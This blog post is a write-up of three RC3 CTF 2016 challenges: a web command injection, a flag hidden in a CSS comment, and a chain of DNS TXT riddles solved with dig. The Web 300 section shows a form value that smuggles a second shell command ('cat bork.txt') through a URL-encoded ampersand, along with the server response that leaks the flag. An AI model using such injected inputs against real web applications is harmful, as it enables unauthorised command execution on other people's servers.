+++
creatordisplayname = "whatbatman"
creatoremail = "whatbatman@protonmail.com"
date = "2017-05-02T13:23:26Z"
description = "Writeup for the challenges I remembered to write up from RC3CTF2016"
lastmodifierdisplayname = "whatbatman"
lastmodifieremail = "whatbatman@protonmail.com"
tags = ["ctf","pwn", "rc3"]
title = "RC3 CTF 2016"

[menu]

  [menu.main]
    identifier = "RC3_CTF_2016"
    parent = "CTF"
    weight = 10

+++

The [RC3 CTF](https://rc3.club/) is a CTF for students by students. I helped create the Misc 500 challenge 'Where's Phil?', as tradition. 
While staying on chat to help people with it I decided to solve a couple of challenges.

# Web 300
Web 300 was a fun yet frustrating challenge. 
Basically, the web app is loading a text file, which of course is controlled by the client ;)

Here is an example request/response

Request

<pre><code>
 POST /bork HTTP/1.1
    Host: ctf.rc3.club:3100
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://ctf.rc3.club:3100/
    Cookie: session=.eJwNj7FugzAQQH-lupkB7LIgdamMEMMdQjKtfJtDCMFgKjWpCBfl34ve8KY3vCf4c5xWKC5-uQ0JTGcoMpWnCaw_az9A8YS3ExSAwgvHTlDVGVatIoWCdszR8tJY985mWTB0OVmenGo1CWqqanEybxQO7NeVqk7I1g8ys3Bw0phasS1TjnXGodxQ2rQxo2JTZhR4xugUfrfaxfJxeEczarL9zmHcG_sZSHrFEfXR7C50m5Nekyo_4JXA3234XX08BmC7-vvJ36Nf4fUP8ZtOrQ.CxJXdw.Sk-MxGH992QOLyhui-AKoYYlSh0
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 20

    bork=BorkBusters.txt
</pre></code>

**Response**

<pre><code>
  HTTP/1.1 200 OK
    Server: nginx/1.10.0 (Ubuntu)
    Date: Sat, 19 Nov 2016 22:13:46 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Content-Length: 381

    <!DOCTYPE html>
    <html>
        <head>
            <link rel="stylesheet" type="text/css" href="/static/bork.css">
            <link rel="shortcut icon" href="/static/favicon.ico">
        </head>
        <body>
            <h1>HERE'S YOUR BORK!!!!</h1>
            <iframe width="854" height="480" src="https://www.youtube.com/embed/vwGnXKNGjT0?autoplay=1&loop=1" frameborder="0"></iframe>
        </body>
    </html>
</pre></code>

So, what we can do is simply pass an `&` web encoded, and execute commands:

**Request**
<pre><code>
bork=lsBorkBusters.txt%26%20cat%20bork.txt
</pre></code>

**Response**

<pre><code>
&nbsp;&nbsp;&lt;body&gt;<br />
&nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;h1&gt;HERE&#039;S YOUR BORK!!!!&lt;/h1&gt;<br />
&nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;iframe width=&quot;854&quot; height=&quot;480&quot; src=&quot;RC3-2016-L057d0g3<br />
&nbsp;&nbsp; &nbsp;cat: borks/lsBorkBusters.txt: No such file or directory?autoplay=1&amp;loop=1&quot; frameborder=&quot;0&quot;&gt;&lt;/iframe&gt;<br />
&nbsp;&nbsp; &nbsp; &nbsp; &nbsp;&lt;/body&gt;
</pre></code>

That's all there was to it. I thought it was going to be much more complicated and spent too long trying to figure it out...

# Web 100
This one was a nice and easy warm up.
**Description**

>   **Who's a good boy? 100**

>    You’re trying to see the cute dog pictures on ctf.rc3.club. But every time you click on one of them, it brings you to a bad gateway.

>    https://ctf.rc3.club:3000/

>   -- Your friendly neighborhood webadmin


For this challenge the `css` file was listed in the `view source` file.

<pre><code>
&lt;link rel="stylesheet" href="doge.css"/&gt;
</pre></code>

in `doge.css`, the flag is:

<pre><code>
/*here's a flag :)*/
flag:RC3-2016-CanineSS
</pre></code>


# Misc 200
This challenge has to do with DNS, oh boy.
Honestly it's more of being punlarious than anything.

You start with the following prompt:

> Welcome to the "Bridge of Cyber"! It's the same concept as the "Bridge of Death" in Holy Grail. Our DNS servers aren't very good at their job because they ask more questions then they answer. Let's see if you can get the flag from our DNS.

>  Nameserver: ns-920.awsdns-51.net

>   Domain: misc200.ctf.rc3.club


To start off, let's dig this info:

<pre><code class="hljs perl">
~$ dig -t txt misc200.ctf.rc3.club @ns-920.awsdns-51.net
    ; <<>> DiG 9.8.3-P1 <<>> -t txt misc200.ctf.rc3.club @ns-920.awsdns-51.net
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14009
    ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0
    ;; WARNING: recursion requested but not available

    ;; QUESTION SECTION:
    ;misc200.ctf.rc3.club.      IN  TXT

    ;; ANSWER SECTION:
    misc200.ctf.rc3.club.   300 IN  TXT "What is the air-speed velocity of an unladen swallow"

... unnecessary info
</pre></code>

Huh, that is an interesting question,

> "What is the air-speed velocity of an unladen swallow"

Clearly the true answer is 'european', so let's try that:

<pre><code>
~$ dig -t txt european.misc200.ctf.rc3.club @ns-920.awsdns-51.net

    ; <<>> DiG 9.8.3-P1 <<>> -t txt european.misc200.ctf.rc3.club @ns-920.awsdns-51.net
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48407
    ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0
    ;; WARNING: recursion requested but not available

    ;; QUESTION SECTION:
    ;european.misc200.ctf.rc3.club. IN  TXT

    ;; ANSWER SECTION:
    european.misc200.ctf.rc3.club. 300 IN   TXT "The roundest knight at king arthurs table was sir cumference. He acquired his size from too much __"
</pre></code>

> "The roundest knight at king arthurs table was sir cumference. He acquired his size from too much"

**Pi! Pi is yummy!**

<pre><code>
~$ dig -t txt pi.european.misc200.ctf.rc3.club @ns-920.awsdns-51.net

    ; <<>> DiG 9.8.3-P1 <<>> -t txt pi.european.misc200.ctf.rc3.club @ns-920.awsdns-51.net
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38191
    ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0
    ;; WARNING: recursion requested but not available

    ;; QUESTION SECTION:
    ;pi.european.misc200.ctf.rc3.club. IN   TXT

    ;; ANSWER SECTION:
    pi.european.misc200.ctf.rc3.club. 300 IN TXT    "What is it that no man ever yet did see, which never was, but always is to be?"
</pre></code>

> What is it that no man ever yet did see, which never was, but always is to be?

<pre><code>
~$ dig -t txt tomorrow.pi.european.misc200.ctf.rc3.club @ns-920.awsdns-51.net

    ; <<>> DiG 9.8.3-P1 <<>> -t txt tomorrow.pi.european.misc200.ctf.rc3.club @ns-920.awsdns-51.net
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65201
    ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0
    ;; WARNING: recursion requested but not available

    ;; QUESTION SECTION:
    ;tomorrow.pi.european.misc200.ctf.rc3.club. IN TXT

    ;; ANSWER SECTION:
    tomorrow.pi.european.misc200.ctf.rc3.club. 300 IN TXT "My favorite things in life don't cost any money. It's really clear that the most precious resource we all have is ___"
</pre></code>


> "My favorite things in life don't cost any money. It's really clear that the most precious resource we all have is"


Time is the most precious thing of all

After doing the lookup again though, we have an interesting issue, there's no txt record! Are the riddles over?


<pre><code>
~$ dig -t txt time.tomorrow.pi.european.misc200.ctf.rc3.club @ns-920.awsdns-51.net

    ; <<>> DiG 9.8.3-P1 <<>> -t txt time.tomorrow.pi.european.misc200.ctf.rc3.club @ns-920.awsdns-51.net
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5272
    ;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
    ;; WARNING: recursion requested but not available

    ;; QUESTION SECTION:
    ;time.tomorrow.pi.european.misc200.ctf.rc3.club.    IN TXT

    ;; AUTHORITY SECTION:
    misc200.ctf.rc3.club.   900 IN  SOA ns-1526.awsdns-62.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400

    ;; Query time: 15 msec
    ;; SERVER: 205.251.195.152#53(205.251.195.152)
    ;; WHEN: Sat Nov 19 21:45:41 2016
    ;; MSG SIZE  rcvd: 149
</pre></code>

Luckily, we are smart DNS users and know of the -t any flag for dig, which gives us the flag! Yay!

<pre><code>
~$ dig -t any time.tomorrow.pi.european.misc200.ctf.rc3.club @ns-920.awsdns-51.net
    ; <<>> DiG 9.8.3-P1 <<>> -t any time.tomorrow.pi.european.misc200.ctf.rc3.club @ns-920.awsdns-51.net
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59971
    ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0
    ;; WARNING: recursion requested but not available

    ;; QUESTION SECTION:
    ;time.tomorrow.pi.european.misc200.ctf.rc3.club.    IN ANY

    ;; ANSWER SECTION:
    time.tomorrow.pi.european.misc200.ctf.rc3.club. 300 IN SPF "RC3-2016-cyb3rxr05"

    ;; AUTHORITY SECTION:
    misc200.ctf.rc3.club.   172800  IN  NS  ns-1526.awsdns-62.org.
    misc200.ctf.rc3.club.   172800  IN  NS  ns-1842.awsdns-38.co.uk.
    misc200.ctf.rc3.club.   172800  IN  NS  ns-489.awsdns-61.com.
    misc200.ctf.rc3.club.   172800  IN  NS  ns-920.awsdns-51.net.

    ;; Query time: 25 msec
    ;; SERVER: 205.251.195.152#53(205.251.195.152)
    ;; WHEN: Sat Nov 19 21:46:42 2016
    ;; MSG SIZE  rcvd: 235
</pre></code>
While this challenge wasn't horribly challenging, it was a lot of fun to figure out the riddles. And now we all know what it feels like to be a DNS server :p
